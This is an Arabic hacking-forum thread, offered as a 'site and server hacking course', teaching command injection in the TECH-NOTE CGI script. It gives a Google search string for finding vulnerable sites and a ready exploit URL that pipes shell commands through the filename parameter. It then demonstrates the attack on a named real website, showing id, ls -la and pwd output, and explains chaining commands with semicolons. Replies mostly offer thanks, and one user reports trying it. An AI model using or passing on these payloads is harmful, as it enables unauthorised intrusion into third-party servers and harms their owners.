المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : استغلال ثغرات Command ExecuTion



ASDELY-ScOrPiOn
07-23-2009, 11:47 AM
الدورة التعليمية لاختراق المواقع و السيرفرات مقدمة من طرف ASDELY & SCORPION
=/=/=/=/=/===================================
استغلال ثغرات Command ExecuTion
--==/=/=/=/=/=/=============================/
ثغرات الCommand ExecuTion بالمختصر المفيد هي الثغرات التي تجعلنا نطبق اوامر Linux على السرفر .
الثغرة اللي سوف نطبق عليها درسنا في سكربت TECH-NOTE
[+] كود البحث في جوجل : inurl:/cgi-bin/technote
[+] الاستغلال : main.cgi?down_num=5466654&board=rebarz99&command=d own_load&filename=rb9.txt|id|
ملاحضة : الحاجة الوحيدة التي يجب تغييرها في الاستغلاله هي كلمة id , ضعو مكانها اي امر لنكس تريدونه (ls -la , uname -a , pwd...)
الان نبدئ تطبيق هذه الثغرة >>
اولا نشوفو اي محرك بحث : انا سوف اختار www.google.com (http://www.google.com)
ثم نكتب كود البحث >> inurl:/cgi-bin/technote
اوكي كل تمام >> نختار اي موقع من المواق المحصل عليها : http://www.loveject.com/cgi-bin/technote (http://www.loveject.com/cgi-bin/technote)
الان سوف نطبق الثغرة باضافة الاستغلال >>
http://www.loveject.com/cgi-bin/technote/main.cgi?down_num=5466654&board=rebarz99&command=d own_load&filename=rb9.txt|id (http://www.loveject.com/cgi-bin/technote/main.cgi?down_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|id)|
النتيجة :
############################
uid=99(nobody) gid=99(nobody) groups=99(nobody)
############################
لووووول الثغرة شغالة تمام >>
نشوف اوامر لنكس اخرى :
|ls -la| النتيجة :
#############################
total 1320
drwxr-xr-x 7 byunghalee byunghalee 4096 May 14 2004 .
drwxrwxrwx 10 byunghalee byunghalee 4096 Sep 4 2003 ..
-rwxr-xr-x 1 byunghalee byunghalee 61515 Oct 25 2002 allshop.cgi
drwxrwxrwx 52 byunghalee byunghalee 4096 May 7 02:33 board
-rw-r--r-- 1 byunghalee byunghalee 184 Jan 28 2004 chat.gif
drwxrwxrwx 5 byunghalee byunghalee 4096 Sep 4 2003 config
-rwxr-xr-x 1 byunghalee byunghalee 17091 Nov 17 2002 config.cgi
-rwxr-xr-x 1 byunghalee byunghalee 214058 Oct 17 2002 help.cgi
-rwxr-xr-x 1 byunghalee byunghalee 51242 Jan 28 2004 humor.cgi
-rwxr-xr-x 1 byunghalee byunghalee 61171 May 30 2003 iboard.cgi
-rwxr-xr-x 1 byunghalee byunghalee 61171 Jan 28 2004 iboard2004.cgi
drwxr-xr-x 2 byunghalee byunghalee 4096 Jan 28 2004 iboardicon
drwxrwxrwx 12 byunghalee byunghalee 4096 Sep 4 2003 image
-rwxr-xr-x 1 byunghalee byunghalee 86020 Sep 1 2002 index.cgi
-rwxr-xr-x 1 byunghalee byunghalee 60548 Mar 21 2003 inews.cgi
-rwxrwxrwx 1 byunghalee byunghalee 21853 Jan 13 2003 info.html
-rwxr-xr-x 1 byunghalee byunghalee 16696 Jun 30 2003 infor.cgi
-rwxr-xr-x 1 byunghalee byunghalee 2240 Jan 23 2003 install.cgi
drwxrwxrwx 2 byunghalee byunghalee 4096 Sep 4 2003 library
-rwxr-xr-x 1 byunghalee byunghalee 9501 Jun 4 2003 loginform.cgi
-rwxr-xr-x 1 byunghalee byunghalee 60947 Nov 17 2002 love.cgi
-rwxr-xr-x 1 byunghalee byunghalee 58058 Jan 27 2003 loveject.cgi
-rwxr-xr-x 1 byunghalee byunghalee 70726 Oct 17 2002 main.cgi
-rwxr-xr-x 1 byunghalee byunghalee 38765 Jan 29 2004 news2004.cgi
-rwxr-xr-x 1 byunghalee byunghalee 81832 Nov 6 2004 print.cgi
-rwxr-xr-x 1 byunghalee byunghalee 61506 Sep 1 2002 read.cgi
-rwxr-xr-x 1 byunghalee byunghalee 60694 May 10 2003 sayun.cgi
-rwxr-xr-x 1 byunghalee byunghalee 56419 Oct 24 2002 shop.cgi
-rwxr-xr-x 1 byunghalee byunghalee 16432 Sep 1 2002 upgrade.cgi
-rw-r--r-- 1 byunghalee byunghalee 42416 May 2 2003 ?¹Aü±¸µI¹?¸?AI.html
############################
|pwd| التيجة :
##############################
/wecan/byunghalee/www.loveject.com/cgi-bin/technote
###############################
ملاحضة مهمة جذا : منكم من سوف يتساؤل عن طريقة تطبيق اوامامر متسلسلة , مثلا امر الدخول الى مجلد ثم امر اضهار الملفات حق هذا المجلد >> الطريقة سهلة جدا اذ يكفي فصل الاوامر بعالمة ;
+ مثلا نريد الدخول الى مجلد اسمه config ثم اضهار الملفات حق هذا المجلد >> main.cgi?down_num=5466654&board=rebarz99&command=d own_load&filename=rb9.txt|cd config;ls -la|
اظن كل شيء واضح , يلا سلام يا شباب >>:D
انتهى الشرح :)

BLACK.JaGuAr
09-02-2009, 06:11 AM
http://www.samysoft.net/forumim/shokr/1/868686.gif

الحسيني
09-11-2009, 05:41 AM
جزاك الله خير

Dr.BiLLi.HaCkEr
10-12-2009, 02:41 AM
جزاك الله خير هلا والله ومليون غلا تو مانور المنتدى

°•ஓ•°M G R N°•ஓ•°
10-18-2009, 12:23 AM
يعطيك آلف عافيه يالغلا
تقبل مروري المتوآضع

،

AlexAnder
11-14-2009, 01:16 PM
الثغره شغاله زى الفل
وجربتها
بس فى حاجه وقفت معايا وهى اوامر اللينكس ما فهمتهاش
شكرا يا غالى

sahrawi7
08-09-2010, 10:06 PM
مشكوووووووووووووووووووووو وووووووووووووووووور يا غالي